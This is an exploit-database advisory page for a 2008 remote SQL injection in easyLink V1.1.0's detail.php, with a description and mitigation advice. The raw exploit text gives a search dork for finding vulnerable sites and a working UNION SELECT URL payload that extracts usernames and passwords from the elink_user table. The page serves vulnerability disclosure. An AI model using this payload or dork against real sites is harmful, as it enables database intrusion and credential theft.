header-logo
Suggest Exploit
vendor:
easyLink
by:
Egypt Coder
9
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: easyLink
Affected Version From: V1.1.0
Affected Version To: V1.1.0
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

easyLink V1.1.0 (detail.php) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability was discovered in easyLink V1.1.0 (detail.php). An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server, which contains malicious SQL statements in the 'act' and 'cat' parameters. This can allow the attacker to gain access to sensitive information from the database, such as user credentials.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL statements. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

================================================================================
easyLink V1.1.0 (detail.php) Remote SQL Injection Vulnerability
================================================================================



Discovered By: Egypt Coder

home : WWW.Sec-Area.com

Mail: Egyptcoder@hotmail.com



Dork: Engine powered by easyLink V1.1.0.



Exploit :


http://localhost/links/detail.php?act=show&cat=1+union+select+1,2,concat_ws(0x3a,user,passwort),4,5+from+elink_user


Greets  rUnViruS, Error Code, H666p , Fear Master , ProViDoR

# milw0rm.com [2008-09-19]

Navigation

Suggest Exploit

Services By CQR